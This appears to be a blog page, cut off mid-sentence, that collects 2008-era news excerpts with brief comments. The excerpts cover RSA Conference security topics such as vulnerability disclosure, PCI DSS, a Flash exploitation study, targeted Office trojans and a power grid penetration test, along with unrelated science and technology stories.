"If you find a vulnerability, we ask that you share it with us. If you share it with us, we will respond to you with a time we will fix that hole," explained Petry.

"If we do so, that is our responsible response, please don't disclose [the vulnerability]."

That philosophy, combined with a policy of crediting all researchers who report flaws, has been very successful for Google, said Petry.

---------------------------

Security training for developers & code reviews from third-party security vendors.

No secret there, but it works....and it is always shocking to find large corporations that don't take these simple yet effective steps to secure their products and environments.

Basically PCI v1.1 was worded to encourage companies to do code reviews....but most want to ignore the core problems and install loads of application firewalls.

IBM Research Spins 'Racetrack' Nano-Magnetic Memory

Via InformationWeek -

A next-generation nonvolatile memory dubbed "racetrack" is expected to initially replace flash memory and eventually hard-disk drives, according to IBM (NYSE: IBM) Corp. fellow Stuart Parkin of its Almaden Research Center (San Jose, Calif.)

Using spintronics--the storage of bits generated by the magnetic spin of electrons rather than their charge--a proof-of-concept shift register was recently demonstrated by IBM. The prototype encodes bits into the magnetic domain walls along the length of a silicon nanowire, or racetrack. IBM uses "massless motion" to move the magnetic domain walls along the nanowire for the storage and retrieval of information.

"We have now demonstrated a current-controlled, domain-wall, shift register which is the fundamental, underlying technology for racetrack memory," said Parkin. "We use current pulses to move a series of domain walls along a nanowire, which is not possible to do with magnetic fields."

IBM's goal, based on spintronic patents filed as early as 2004, is to use the same square micron that currently houses a single SRAM memory bit, or 10 flash bits, and drill down into the third dimension to store spin-polarized bits on a sunken racetrack-shaped magnetic nanowire. Using an area of silicon 1 micron wide and 10 microns high, IBM said its first-generation racetrack would store 10 bits compared to one, thereby replacing flash memory. Eventually, it could store 100 bits in the same area, which is dense enough to replace hard-disk drives.

"Racetrack is essentially the third turn of the crank of this new field of engineering called spintronics," said Parkin. "In current solid-state memory devices you store and control the flow of electrical charge. Here, we store and control the flow of the spin of an electron."

Electronic Voting Experts Tell Vendors to Work with Researchers

Via SecurityFocus -

Hackers finding flaws, vendors reacting with threats: The relationships between security researchers and voting machine makers resemble the early days of the PC industry and that's not good, e-voting experts said at the RSA Security Conference on Thursday.

Computer scientists and academic security researchers have managed to find numerous and serious holes in the security of electronic voting systems in the past decade, despite the assurances of voting system makers that their machines are secure. It's no surprise then that rather than fostering a partnership between the hackers and the vendors -- as Microsoft managed to do over the past decade -- voting machine makers continue to be hostile to those that find vulnerabilities. That lack of a relationship has to change, a panel of five electronic voting experts told attendees.

"There is so much distrust between the academic community and the vendor community, that no one is working together," said Alec Yasinsac, associate professor of computer science at Florida State University. "I think it is essential for the vendor community to step up and engage the academic community."

A major issue with most electronic voting machines is that there is no way to do a software-independent audit of the election results. In the 2006 midterm elections, many states took extra security precautions after researchers found that Diebold's election systems contained a serious flaw. Another election system failure may have resulted in a loss for the Democratic challenger in a contest for one of Florida's seats in the U.S. House of Representatives, when the configuration of the electronic ballot likely resulted in a large number of people in a Democratic-leaning county failing to vote.

Given their history, vendors and researchers have their work cut out for them in creating a amicable relationship, said panelist David Wagner, an associate professor of computer science at the University of California at Berkeley.

"Voting system vendors are, today, where Microsoft was ten years ago," Wagner said.

And for Microsoft, it required a strong commitment from its CEO Bill Gates and hundreds of millions of dollars to better secure its software.

Friebet - Attacking Your Backend Database from Your Backyard

Via McAfee Avert Lab Blog -

Just a month ago, we blogged about massive security incidents, relating to SQL injection attacks, that insert iframe links to remote sites that host exploit scripts and malware. Recently, we discovered the Fribet trojan, where the author was riding on both the success of such attacks and the controversy of the Tibet issue. The trojan was discovered on Pro-Tibet sites that were possibly hijacked to host Exploit-MS07-004, which appear to be specifically crafted.

When visitors of the pro-Tibet websites are infected, the Fribet trojan provides remote control and monitoring functions such as creating new files or folders, starting or terminating processes, and sending/receiving additional malware. Additionally, the Fribet trojan loads the “SQL Native Client” ODBC library, and is designed to receive arbitrary SQL statements from a command and control server. In turn, the ODBC library provides the functionality to Fribet to bind SQL connections and run arbitrary SQL commands from the victim machine(s). At the time of our research, the command and control server was not sending us commands. However, our reverse engineering of the malicious code shows it is more than capable of the following:

• Bind and connect to local or remote databases from the victim machine
• Query and steal data from local or remote databases
• Insert arbitrary data into local or remote databases, including web data such as hosting a web exploit

The attacker still needs to find out the information required to connect the database such as DSN, hostname, database name, User and Password, however, that information can be collected via other monitoring functions of Fribet, and it can also enumerate weak and default values.

This trojan apparently can be used as an alternate to SQL Injection attacks, but in a more direct way. Even the administrators of secure web sites, protected against common SQL injection attacks, should ensure database backends are equally secure to defend against such a penetration vector.

----------------------------

Clearly, this is a trojan designed to attack corporate users....

Researchers Uncover Information Black Holes Across the Internet

Via tgdaily.com -

The reason why you cannot reach a specific web site at any given time can be very simple. Server and hosting issues, maintenance or the plain fact that a site has been discontinued are the most likely explanations why a site just won’t load. But there is another, more mysterious possibility: Black holes. A team at the University of Washington (UW) has begun mapping scenarios where information packets on the Internet simply disappear.

"There's an assumption that if you have a working Internet connection then you have access to all of the Internet," said Ethan Katz-Bassett, a UW doctoral student in computer science and engineering. "We found that's not the case."

Katz-Bassett has been working on a project called Hubble, a system that apparently is able to track what he refers to as information black holes. These are situations where a path between two computers does exist, but messages - a request to visit a Web site or an outgoing e-mail - get lost along the way. Katz-Bassett has published a Hubble map that enables users to monitor such black holes worldwide or simply type in a network address to check its status.

To determine a network status, Hubble sends test messages “around the world” to look for computers that can be reached from some but not the entire Internet, a situation that is described as “partial reachability”. Katz-Bassett said that short communication blips are ignored. However, if a problem surfaces in two consecutive 15-minute trials, it is listed as a “problem”. The research team found that more than 7% of computers worldwide experienced this type of error at least once during a three-week period in fall of 2007.

"When we started this project, we really didn't expect to find so many problems," said Arvind Krishnamurthy, a UW research assistant professor of computer science and engineering and Katz-Bassett's doctoral adviser. "We were very surprised by the results we got."

----------------------

Very interesting....

Next Version of PCI DSS Due in September

Via TechTarget -

PCI Security Standards Council General Manager Bob Russo said merchants can expect the next revision to the Payment Card Industry Data Security Standard in September.

"I can't really tell you if it's going to be a rev, or a new version number. In my mind, it doesn't really matter if it's a 1.2 or a 2.0; anything that gets changed is something you've got to address," Russo said. "It won't be anything too drastic. It will be based on input we've gotten over the last year and a half from all of our stakeholders."

Russo said some of the areas that will be tweaked or clarified will be around wireless implementations, application security and pre-authorization.

Russo is attending RSA Conference 2008, where thousands of IT security professionals have gathered this week. PCI and compliance issues are among top concerns of conference attendees.

Russo said that the PCI standard lives on a two-year lifecycle, and the next version comes due in September. A beta version of the standard will be released in August to the council's 500 participating organizations, as well as all of the council's qualified security assessors for feedback. They'll have 30-45 days to look it over for a "sanity check," Russo said. "It's a pretty good checks-and-balances system."

Russo said that additional guidance and clarification will be available in May for requirement 6.6, which moves from best practice to mandatory on June 30. PCI 6.6 has been the subject of some confusion for merchants trying to interpret how it's written. . The section, which falls under the main heading of developing and maintaining secure systems and applications, covers the security of Web-facing applications. As of June 30, it will mandate that Web apps be protected against known attacks by either having custom code reviewed by a third party, or by installing an application-layer firewall in front of a Web app.

"There are guidance documents coming out that will clarify a lot of this stuff before June," Russo said.

The council recently posted a new document on its site called Navigating the DSS, which goes through each of the requirements in detail, explaining the intent and how requirements can be met.

The confusion over 6.6 rests in the either-or nature of the wording.

"Personally, I'd love to see everyone go through on OWASP-based source-code review, but certainly, that's not going to happen," Russo said, referring to the expensive and time-consuming process of manual code reviews. "So the application firewall is probably the best thing to do, but there needs to be some clarification around what it needs to do. That clarification is coming; that's been the biggest question."

IBM: Application-Specific Attacks - Leveraging the ActionScript Virtual Machine

Memory corruption vulnerabilities are becoming increasingly difficult to exploit, largely due to the protection mechanisms being integrated into most modern operating systems. As general protection mechanisms evolve, attackers are engaging in more specific, low-level application-targeted attacks. In order to refine general countermeasures (or at least raise awareness of their shortcomings), it is important to first understand how memory corruption vulnerabilities are exploited in some unique scenarios.

The following case study describes a unique exploitation scenario using a recently disclosed flash vulnerability that was reported to Adobe by IBM. At first the vulnerability seemed to offer limited exploitation options, but further analysis uncovered an application-specific attack that results in reliable, consistent exploitation. Achieving the same exploitation with more conventional methods is unlikely. The technique presented leverages functionality provided by the ActionScript Virtual Machine – an integral part of Adobe Flash Player. Further, it will be shown that the vulnerability can be successfully exploited without leaving telltale signs, such as a browser crash following the attack.

Although this document deals specifically with the Win32/intel platform, similar attacks can most likely be carried out on the many other platforms flash is available for. In particular, some of the methodology discussed might be useful for constructing a robust exploit on Unix platforms as well as several embedded platforms. Understanding the specific scenarios used to exploit memory corruption vulnerabilities will help improve protection strategies.

----------------------------

By Mark Dowd
X-Force Researcher IBM Internet Security Systems
http://documents.iss.net/whitepapers/IBM_X-Force_WP_final.pdf

Six Pirates Captured in Hijacking of French Yacht Off Somalia

Via FoxNews -

French officials on Friday said six pirates have been captured in connection with a Somali hijacking.

Pirates earlier had freed 30 hostages held aboard a French tourist yacht off Somalia's coast for the past week, French President Nicolas Sarkozy said Friday.

In a statement, Sarkozy thanked the French army and other French agencies "that allowed a quick end" to the hostage-taking. The statement did not elaborate on the role of the French military, but said the hostages were freed "without incident."

The statement did not say when the hostages were released or where they were. Foreign Minister Bernard Kouchner said France would organize the hostages' return "as soon as possible" and welcomed the "happy ending" to the standoff.

Sarkozy will meet the families of the hostages in Paris on Friday afternoon.

Pirates seized the yacht, called Le Ponant, in the Gulf of Aden on April 4. It was carrying 30 crew members, including 22 French citizens and six citizens of the Philippines.

Does The Future Hold an Algae-Powered Bimmer?

Via Argonne National Laboratory -

Independent tests conducted by engineers at the U.S. Department of Energy's (DOE) Argonne National Laboratory on the mono-fueled version of the BMW Hydrogen 7 prototype have found that the car's hydrogen-powered engine surpasses the super-ultra low-emission vehicle (SULEV) level, the most stringent emissions performance standard to date.

"The BMW Hydrogen 7's emissions were only a fraction of SULEV level, making it one of the lowest emitting combustion engine vehicles that have been manufactured," says Thomas Wallner, a mechanical engineer who leads Argonne's hydrogen vehicle testing activities.

"Moreover, the car's engine actively cleans the air. Argonne's testing shows that the Hydrogen 7's 12-cylinder engine actually shows emissions levels that, for certain components, are cleaner than the ambient air that comes into the car's engine." It was not an easy task to measure the Hydrogen 7's emissions. "A gross polluter is easy to measure, but the cleaner the car the harder it is to test," says Don Hillebrand, director of Argonne's Center for Transportation Research.
"Most labs test at the SULEV level. Argonne's vehicle testing facilities are unique in that they are able to detect even trace levels of emissions. In this case, it was near-zero emissions."

After an extensive evaluation by BMW, "Argonne's Advanced Powertrain Research Facility was found to be the only public test facility in North America capable of testing hydrogen vehicles at these low emissions levels," says BMW's Wolfgang Thiel, manager, operating support emissions analysis. "Zero is a very small precise number—we are pushing the boundaries of emissions testing."

BMW has put the bi-fueled hydrogen model into limited series production. Although the vehicle is not yet available for sale to the general public, it is being made available to "influential public figures," whose use demonstrate a new era in clean energy, BMW has said. In the meantime, the greatest challenge to widespread use of hydrogen cars is the limited number of hydrogen refueling stations.

Scientists at U.S. Dept. of Energy's Argonne National Laboratory are looking for an alternative to fossil fuels by working to chemically manipulate algae for production of the next generation of renewable fuels—hydrogen gas. "We believe there is a fundamental advantage in looking at the production of hydrogen by photosynthesis as a renewable fuel," senior chemist David Tiede says.

"Right now, ethanol is being produced from corn, but generating ethanol from corn is a thermodynamically much more inefficient process." Some varieties of algae, a kind of unicellular plant, contain an enzyme called hydrogenase that can create small amounts of hydrogen gas.

Tiede said many believe this is used by nature as a way to get rid of excess reducing equivalents that are produced under high light conditions, but there is little benefit to the plant. Tiede and his group are trying to find a way to take the part of the enzyme that creates the gas and introduce it into the photosynthesis process. The result would be a large amount of hydrogen gas, possibly on par with the amount of oxygen created.

"Biology can do it, but it's making it do it at 5-10% yield that's the problem," Tiede says. "What we would like to do is take that catalyst out of hydrogenase and put it into the photosynthetic protein framework. We are fortunate to have Professor Thomas Rauchfuss as a collaborator from the Univ. of Illinois at Champaign-Urbana who is an expert on the synthesis of hydrogenase active site mimics."

Algae has several benefits over corn in fuel production. It can be grown in a closed system almost anywhere, including deserts or even rooftops, and there is no competition for food or fertile soil. Algae is also easier to harvest because it has no roots or fruit and grows dispersed in water. "If you have terrestrial plants like corn, you are restricted to where you could grow them," Tiede says.

"There is a problem now with biofuel crops competing with food crops because they are both using the same space. Algae provide an alternative, which can be grown in a closed photobioreactor analogous to a microbial fermentor that you could move any place." Tiede admitted the research is its beginning phases, but he is confident in his team and their research goals. The next step is to create a way to attach the catalytic enzyme to the molecule.

------------------

http://www.youtube.com/watch?v=uxoFSxM8o8k

RSA: Homeland Security Secretary Outlines Gov Cybersecurity Plans

Chertoff discusses new measures to fight cyberattacks

At RSA 2008 in San Francisco, Secretary of the U.S. Department of Homeland Security Michael Chertoff discusses a new directive focusing on an early warning system to identify cyberattacks before they start.

http://news.zdnet.com/2422-13568_22-196726.html

----------------------------

For those that don't keep up with US government security, Einstein is a new intrusion detection and analysis program that the government plans to install on all ports of entrance into the government network.

While, the steps outlined by Secretary Chertoff are very sensible...most major corporations are ahead of the government.

Given the size of the government network, this project is a huge undertaking...but it is a necessary step and should provide a strong foundation to build upon.

Dish Network Tells Court News Corp Unit Hacked It

Via reuters.com -

Hackers hired by a News Corp unit stole and posted data that allowed free access to Dish Network's satellite television service, the company said, in a corporate spying trial against its rival that could be worth hundreds of millions of dollars.

Dubbed the "Black Hat Team," the computer whizzes flooded the market with smart cards that allowed free satellite TV access, a lawyer for Dish said on Wednesday. The suit was brought by EchoStar Communications which later split into two companies, Dish and EchoStar Corp.

A lawyer for News Corps's NDS Group denied that the company engaged in spying, saying during opening statements in the trial that it was instead engaged in reverse engineering by obtaining the codes and were monitoring piracy.

"Because this is a competitive business, NDS also monitors competitors," NDS attorney Richard Stone told jurors. "NDS has done nothing to illegally harm or damage EchoStar. All NDS has done is compete hard and fair in the marketplace."

Dish is suing NDS and NDS Americas in a corporate espionage trial that U.S. District Judge David Carter said could bring an award of "hundreds of millions or perhaps billions."

The potential damages are based on claims of lost revenue and the cost of fixing the compromised system.

"(NDS) came up with a plan - take these hackers off the streets and turn them on the competitors," Dish's lead attorney, Wade Welch, told the jury. "They called it the Black Hat Team."

NDS, which provides encryption technology to a global satellite empire that includes News Corp's DirecTV in the United States, "made the calculated decision to hire the worst and most well-known satellite pirates and hackers in the world in an effort to establish and maintain control ... over its competitors' technology" EchoStar claims in its lawsuit.

The spying allegedly began in 1998 when DirecTV was constantly getting hacked and was debating whether to leave NDS and sign on with EchoStar's superior system, Welch said.

Dish is claiming copyright violation, conspiracy, and piracy in a case that is expected to last a month and produce testimony from hackers and top company officials from as far away as Israel, Europe, Switzerland and Canada.

Experts Hack Power Grid in No Time

Via NetworkWorld -

Cracking a power company network and gaining access that could shut down the grid is simple, a security expert told an RSA audience, and he has done so in less than a day.

Ira Winkler, a penetration-testing consultant, says he and a team of other experts took a day to set up attack tools they needed then launched their attack, which paired social engineering with corrupting browsers on a power company's desktops. By the end of a full day of the attack, they had taken over several machines, giving the team the ability to hack into the control network overseeing power production and distribution.

Winkler says he and his team were hired by the power company, which he would not name, to test the security of its network and the power grid it oversees. He would not say when the test was done, but referred to the timeframe as "now." The company called off the test after the team took over the machines.

"We had to shut down within hours," Winkler says, "because it was working too well. We more than proved that they were royally screwed." In addition to consulting, Winkler is author of the books Spies Among Us and Zen and the Art of Information Security.

Espionage Against Pro-Tibet Groups, Others, Spurred Microsoft Patches

Via Wired.com -

Computer intruders targeting pro-Tibetan groups, U.S. defense contractors and government agencies slipped in through previously unknown security holes in Microsoft Office, prompting Microsoft to issue a flurry of patches to the popular software suite in 2006 and 2007, according to computer security experts.

These attacks, which appeared to have originated in China, began in early 2006 when the attackers started sending e-mails to victims with booby-trapped Word documents and Excel spreadsheets attached.

"We are seeing more and more spying done with Trojans, a shift that has happened in the last two years," Mikko Hyppönen, the chief research officer for software security vendor F-Secure, told RSA conference attendees Thursday morning.

The Pentagon and pro-Tibet groups have previously acknowledged the intrusions, but Hyppönen is the first to link the cyber espionage to a series of patches that Microsoft pushed out without explanation. Microsoft did not immediately reply to a request for comment.

Hyppönen's colleague Patrik Runald notes that from 2005 through early 2006, Microsoft issued few patches for its Office suite. But soon after there was an explosion of patches for critical bugs that could be used to infect a computer, including a record 26 patches in October, 2006, that fixed four critical bugs in Microsoft Office applications.

Those fixes, Runald says, appeared contemporaneously with the rise of targeted attacks on defense companies, nonprofits and government agencies. "They now have an incentive to begin looking for bugs and exploiting them," Runald said. "Bad guys are finding these things fast."
The attackers relied on e-mails tempting the victim to open the attachments, in some cases by presenting them as résumés from job seekers.

But when the target opened the attachment, the application would usually crash, while the embedded code covertly installed a keylogger and data-stealing software that scooped up documents anywhere on the organization's network to which the user had access.

The malware then forwards the stolen information to services called DNS bouncers in China, such as 8800.org, that attackers can use to obfuscate and rapidly change where stolen documents or passwords are sent. Finally, the code opens up what looks to be a legitimate document, in the hopes that the target won't know his or her computer was just infected.

The espionage was highly successful, according to Hyppönen. One multi-billion-dollar defense contractor who went to F-Secure for help found that a single compromised Windows box had been secretly siphoning information to a server in mainland China for 18 months.

"Most attacks go unnoticed and targets don't know they are hit," Hyppönen said.

Hyppönen won't declare that the espionage is the work of the Chinese government or hackers loyal to it, though all the evidence points that way.

"Is it the Chinese?," Hyppönen asked. "It sure looks like it but it could be a smokescreen. We don't know."

Dark Websites and Black PR

By definition, a dark website is a pre-made, non-visible website, that can be activated online when a particular crisis occurs. It is common for most companies to have several ones and all of them are customized according to certain vulnerabilities and corporate risks. They store written-in-advance news releases, pictures, official statements and other background information, as the specific details will only be added right before their release.

The dark site can be placed on a separate domain, be a distinct section of the main website or totally replace the original. It could be saved on any of the corporate servers or be kept safely on a preferred external device.

Because of the significance of dark websites, they have also become targets of many malicious scenarios. Probably the scariest threat for companies is someone intentionally triggering the content of the site online, without the permission of management. The system administrators will soon repair the “mistake”, but the point here is totally different. The actual goal of the attackers is not to create a false appearance of crisis, but to make a destructive buzz and to lower the public trust towards the target. Even if instantly refuted by the corporate crisis team, the situation will still be strong enough to cause a massive confusion among the audience, especially when all of the Web 2.0 applications allow you to achieve that in a matter of minutes. And remember - the information on the Internet always remains cached, so the chances of someone going back to those issues are actually pretty high.

http://www.spinhunters.org/blog/dark-websites-hide-many-security-threats/

--------------------

Black PR is pretty interesting stuff.

Why attack a huge mega-corporation's firewall, when you could attack their stock price just as easy (perhaps even easier)?

IBM's 'Phantom' to Study Virtual Security

Via DarkReading -

RSA Conference 2008 -- IBM has begun a new research project designed to find and fix security vulnerabilities in virtual computing environments.

The project, a joint initiative between IBM's X-Force security research team and IBM Research, is code named Phantom. It will help identify potential vulnerabilities in virtualized environments and use network and host intrusion prevention technology to guard them.

"There's a lot of momentum behind virtualization out there, but not everyone has thought through the security implications," says Joe Anthony of IBM's Tivoli unit. "Phantom is taking a deeper look at those."

Under Phantom, IBM will develop technology to monitor and disrupt malicious communications between virtual machines. Phantom will also seek out ways to monitor the security state of virtual machines to protect them against known and unknown threats before they occur. "We'll analyze behavioral patterns, not just signatures," Anthony says.

IBM is also looking for ways to secure the hypervisor, which is a central point of control for all machines running on a virtualized platform. "We'll be looking not only at our own platform, but at different hypervisors from different vendors," Anthony says.

The Mac Guru of Damascus in the Case of the Missing Laptops

Via Wired.com -

Before my fiancée and I headed to Syria to study Arabic, we often heard there was one advantage to living in a police state: almost no crime. So it came as a surprise when Sara and I returned to our Damascus apartment one night after a dinner party to find splintered wood in the hallway — wood that had once been part of our front door.

I made a beeline for the living room to check on our most valuable possessions: my MacBook and Sara's MacBook Pro. Both gone.

There's no 911 in Damascus, so we called our landlord, who contacted the cops. Within an hour, a dozen police were on the scene. About half of them sat around fingering unlit cigarettes. (Pushy Americans, we had asked them not to smoke inside.) The others engaged in what could generously be called an investigation. They took fingerprints from the door. They dusted the fridge. "Maybe the robber was thirsty," one said. They did not dust the coffee table where the laptops had been sitting.

The size of the police contingent was itself disconcerting. Damascus' finest had probably come out in force simply because it's not often a foreigner's home gets burglarized. But it's easy to get paranoid in Syria. We wondered whether some of the cops — like the ones wearing dark leather jackets — were "special" police, more interested in us than the crime. (Being a foreign journalist in Syria on a tourist visa can invite extra attention. Also, how to put this delicately, we were returning home from a Shabbat dinner.)

The next morning, our landlord accompanied us to the local police station to press our case. The commander was a friendly, well-fed man with an impressive mustache and the terminal stage of a comb-over. He asked a few questions about the theft and many more about the progress of our studies.

Eager to please, I told him a few Arabic jokes I had learned. ("There's this guy with a monkey, see. Along comes a hash addict ...") When I finished, he sat stone-faced — then burst into thunderous laughter. "I like this man!" he bellowed, pinching my cheeks. Sara would have taken a snapshot had our camera not also been stolen.

A few hours later, our computers were back, but it wasn't the police who found them. A friend had put us in touch with Bassel Al Hassan, apparently the one guy in Damascus who services Macs. A few days later we shared a meal with Hassan, a soft-spoken man in his mid-thirties. "Yours were the seventh and eighth stolen Macs I've recovered," he said. "Nobody knows about Macs here. A few other stores buy Macs, but eventually they all come to me, asking, Is it good? How much is it worth?' Then I check the serial numbers."

When Hassan learned our laptops had been pilfered, he called about 20 computer shops. "I didn't tell the owners I was looking for stolen computers, because then maybe they wouldn't buy them," he said.

Soon Hassan got a call about two newly arrived Macs and hustled over to the shop. He confirmed the computers were ours and told the store owner the machines were hot. The proprietor, who had paid $200 for the pair, gave them back to us without taking a penny in exchange, sheepishly delivering them to us at a street corner in our neighborhood. The only thing Hassan asked was permission to "friend" me on Facebook.

A few months later, after Sara and I returned to the US, I spoke with Hassan by phone. He said that he had corralled another stolen Mac just weeks after rescuing ours. From back here in the States, Hassan's role as the Mac Avenger of Damascus seems improbable. Except that I'm writing this article on my recovered laptop.

---------------------

Awesome story.

Lessons from Cyber Storm II

Via GCN -

When things start to go bad on the Internet, communication is the critical element in an effective response, participants in the recent Cyber Storm II exercise said Wednesday at the RSA Security conference.

“There was still a shortfall in information sharing,” said Randy Vickers, assoiate deputy director of the U.S. Computer Emergency Readiness Team (US-CERT), the national center for first response in cybersecurity.

Vickers was part of a panel of government and industry participants in the recent exercise who shared their lessons. The discussion was short on specifics because participants signed nondisclosure agreements to ensure that sensitive data about systems and vulnerabilities is not leaked. An after-action report is expected to be published this fall, but among the preliminary lessons discussed, the need for communication was the one recurring theme.

“Cyber Storm II was fundamentally about identifying and responding to a fast-breaking cyber epidemic,” said Greg Garcia, assistant secretary for cybersecurity and communications at the Homeland Security Department.

The weeklong exercise held last month was the product of 18 months of planning and involved 18 U.S. federal agencies, five countries, nine states, 40 companies, and 10 information sharing and analysis centers. The scenario involved disruptions of telecommunications, the Internet and control systems.

“One of the things we learned was how important vendors are in a crisis,” Garcia said. They are the ones who know what the products are and how they work. Agencies and companies need to establish strong relationships with vendors of critical systems well in advance of a crisis, he added.

Vickers said US-CERT had learned the need for effectively gathering and disseminating information in the original Cyber Storm exercise and built on that in preparation for the second Cyber Storm. “We’re doing things right,” he said. “It is still better than it was,” but there are improvements to be made.

Playing Dead Works For Young Fire Ants Under Attack

Via ScienceDaily -

Pretending to be dead is an effective self-defense strategy adopted by young fire ant workers under attack from neighboring colonies. This tactic makes them four times more likely to survive aggression than older workers who fight back. As a result, these young workers are able to contribute to brood care and colony growth to ensure the survival and fitness of their queen.

These findings were made by Dr. Deby Cassill from the Biology Department at USF Petersburg in Florida and her team from USF Tampa in Florida.*

Feigning death is a method of self-defense used by a wide range of species - mammals, birds, amphibians, lizards, dragonflies, and beetles - in response to threats by predators. Cassill and colleagues studied the death feigning behavior of the highly territorial fire ant, Solenopsis invicta, during attacks by ants from neighboring colonies in the laboratory.

They showed that the age of the victims was a significant predictor of their response to their aggressors. Days-old workers responded to the attacks by pretending to be dead. Weeks-old workers responded by fleeing and months-old workers fought back. By feigning death, young workers were four times more likely to survive the attack than were the older workers who ran away or fought back. The researchers also found that sustained movement from the victims was necessary to trigger a physical attack – known as a kinetic cue.

The authors offer two possible explanations for the death feigning behavior of the young fire ants. The external skeleton of days-old workers is relatively soft. Not only are these young workers prone to injury, they are ineffective in battle as their mandibles and stingers are not sufficiently hardened to penetrate the external skeleton of their aggressors. It may be that young workers pretend to be dead to avoid physical aggression at a time when they are vulnerable to injury and certain to fail. Another explanation is that by feigning death, young valuable workers are spared, allowing them to increase colony growth, which is essential to the survival and fitness of the colony queen.

NextGen Nuclear Fuel May Be Too Hot To Handle

Via Physorg.com -

New high-efficiency nuclear fuel meant to burn longer and stronger may prove unstable in an emergency and hard to dispose of, according experts cited in a report published Wednesday.

By further enriching the uranium used to power nuclear reactors, operators have been able to extract more electricity from a given amount of fuel, a measure expressed in gigawatt-days per tonne of uranium (GWd/tU).

Ramping up fuel efficiency has worked especially well in the pressurised water and boiling water reactors used in the United States and elsewhere.

The objective has been to extract more power from fuel and produce less radioactive waste, one of the most vexing problems associated with nuclear energy.

A new generation of nuclear plants in the United States and Britain is poised to use reactors designed for "burn-up rates" of 60 GWd/tU, according to the British weekly New Scientist, which canvassed experts.

"At these rates, uranium fuel rods should burn for around a year longer than today's best burn-up fuel," the magazine said.

But tests conducted by Michael Billone at Argonne National Laboratory in Illinois, presented last month at a conference in Washington, showed that burn-up rates above 45 GWd/tU would violate US Nuclear Regulatory Commission's (NRC) safety standards unless new methods were devised for packaging the fuel, the magazine reported.

A sudden loss of cooling water -- as happened during the partial meltdown of a reactor core in 1979 at Three Mile Island in Pennsylvania -- would pose such a danger, according to the simulations.

The US nuclear energy's Electric Power Research Institute says that such a loss of coolant is not possible in modern reactors, but the NRC has still launched a three-year review of its safety standards.

"We are actively preparing to revise NRC's safety criteria to account for the burn-up effect," a commission spokesman told New Scientist.

Disposal is also a potential problem because the new, high-efficiency fuel is up to 50 percent more radioactive than fuel currently in use, thus generating far more heat during storage.

Traffic Jams Happen, Get Used to It

Via ScienceMag.org -

Ever wondered what causes those inexplicable traffic jams on open stretches of highway, the ones without any accidents, construction, or other obvious bottlenecks? A Japanese group has an answer: It's pure physics. A simple experiment shows that when the density of vehicles on a road passes a certain threshold, traffic jams emerge because of fundamental instabilities inherent in multiparticle interactions. In other words, just a few mildly inconsistent drivers on the road will eventually cause a wave of backups.

The cause of so-called phantom traffic jams has been quite controversial, says Dirk Helbing, who studies the physics of social interactions at the Swiss Federal Institute of Technology in Zürich, Switzerland. One camp of traffic researchers believes that even phantom jams have external causes, be they merging traffic, curves, hills, or even a few bozos abruptly changing lanes. But other researchers contend that jams will spontaneously appear simply if the vehicle density exceeds a certain critical value. Yuki Sugiyama, a physicist at Nagoya University in Japan, says the predictions of these models have matched observations of highway traffic.

UMG Says Throwing Away Promo CDs is Illegal

Via EFF -

In a brief filed in federal court yesterday, Universal Music Group (UMG) states that, when it comes to the millions of promotional CDs ("promo CDs") that it has sent out to music reviewers, radio stations, DJs, and other music industry insiders, throwing them away is "an unauthorized distribution" that violates copyright law. Yes, you read that right -- if you've ever received a promo CD from UMG, and you don't still have it, UMG thinks you're a pirate.

This revelation came in a brief for summary judgment filed by UMG against Troy Augusto. Augusto (aka Roast Beast Music Collectibles, eBay handle roastbeastmusic) buys collectible promo CDs at used record stores around Los Angeles and resells them on eBay. UMG sued him last year, claiming that the "promotional use only" labels on the CDs mean that UMG owns them forever and that any resale infringes copyright. EFF took Augusto's case to fight for the proposition that a copyright owner can't take away a consumer's first sale rights just by putting a label on a CD (after all, the Supreme Court first recognized the first sale doctrine when a book publisher tried the same thing with a label stating "may not be sold for less than one dollar," and we've seen patent owners trying the same trick on printer cartridges). In